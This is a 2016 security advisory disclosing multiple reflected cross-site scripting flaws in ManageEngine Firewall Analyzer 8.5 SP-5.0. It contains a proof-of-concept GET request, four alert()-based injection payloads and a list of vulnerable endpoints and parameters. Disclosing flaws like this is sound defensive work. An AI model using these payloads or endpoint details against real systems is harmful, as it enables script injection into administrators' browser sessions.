ManageEngine Firewall Analyzer 8.5 SP-5.0 Cross Site Scripting
Posted on 25 February 2016
ManageEngine Firewall Analyzer 8.5 SP-5.0 Multiple XSS Vulnerabilities Vendor: Zoho Corporation Pvt. Ltd. Product web page: https://www.manageengine.com Affected version: 8.5 SP-5.0 (Build 8500) Summary: ManageEngine Firewall Analyzer is an agent-less log analytics and configuration management software that helps network administrators to centrally collect, archive, analyze their security device logs and generate forensic reports out of it. Desc: Firewall Analyzer suffers from multiple reflected cross-site scripting vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: Apache-Coyote/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5307 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5307.php 26.01.2016 - ---- PoC: GET /fw/addbookmark.do?module=FIREWALL&bk_url=%2ffw%2fmindex.do%3furl%3dfirereport%26reportId%3d2000000304%26tab%3dreport%26subTab%3dshowReport%26RBBGID%3d116'accesskey%3d'x'onclick%3d'alert(1)'%2f%2f HTTP/1.1 Host: 10.0.2.48 --------- Payloads: 'accesskey='x'onclick='alert(1)'// ';alert(2)// "><script>alert(3)</script> "-alert(4)-" --------------------- Other GET parameters: http://10.0.2.48/fw/addbookmark.do - module http://10.0.2.48/fw/createProfile.do - subTab http://10.0.2.48/fw/editUserFormPage.do - editAction http://10.0.2.48/fw/graphs - height http://10.0.2.48/fw/graphs - width http://10.0.2.48/fw/index2.do - subTab http://10.0.2.48/fw/index2.do - url http://10.0.2.48/fw/mindex.do - RBBGID http://10.0.2.48/fw/mindex.do - reportId http://10.0.2.48/fw/mindex.do - subTab http://10.0.2.48/fw/mindex.do - url http://10.0.2.48/fw/reportFilter.do - reportId